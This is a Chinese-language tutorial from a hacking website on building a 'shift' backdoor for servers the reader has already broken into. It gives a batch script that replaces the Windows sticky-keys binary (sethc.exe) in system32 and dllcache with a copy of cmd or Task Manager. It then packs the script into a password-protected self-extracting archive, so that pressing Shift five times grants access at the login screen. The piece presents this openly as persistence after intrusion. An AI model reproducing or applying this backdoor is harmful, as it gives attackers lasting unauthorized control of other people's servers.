栏目

首页 首页 网站漏洞查看内容

利用纯手工打造服务器自解压shift后门

最近更新| 发布者: 站长-黑杰克| 查看: |

    很多时候我们拿到一台服务器之后都会留下一个后门程序方便下次进入.

服务器比较主流的就是shift后门,也替换服务器自带的粘滞键为我们的后门文件

调用方法:按连续按五下Shift即可调出

如果你是服务器的管理员发现按五下shift调出来的不是如下图所示的的粘滞键那么你的服务器肯定是被别人入侵了。

QQ截图20141130093641

好了进入主题这里黒吧安全网教大家纯手工打造服务器自解压shift后门

 


一、新建一个shift.bat批处理内容如下
 

copy shift.exe %systemroot%\system32\sethc.exe /y
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y
cmd.exe

 


稍微懂点就可以看出以上二段代码的意思是将shift.exe重命名为sethc.exe且替换系统盘符复制到系统盘符下的 最后的cmd.exe 即调用出cmd窗口。

 

黑客动画吧小编个人喜欢替换任务管理器也就是直接调出任务管理器(即将cmd.exe修改为taskmgr.exe)

 

二、将来shift.bat添加到压缩文件

右键shift.bat–添加到压缩文件(创建自解压格式压缩文件打上勾)–然后点击高级–点击设置密码–然后点击确定–点击自解压选项。。。

后面不想打了 大家自己看如下动态图片设置吧

1

到此设置完成点击桌面生成的shift.exe输入密码即可自动安装完成。按五下shift即可成功调用了

     转载请附链接www.goodgoodhack.com。问题咨询站长QQ9326665,关于—培训介绍



文章由天启科技原创,抄袭必究,转载请注明:
本文地址:http://www.goodgoodhack.com/heikejishu/wangzhanloudong/1860.html
文章由天启科技站长黑杰克原创,免费学习黑客技术,业务联系站长QQ9326665

最新视频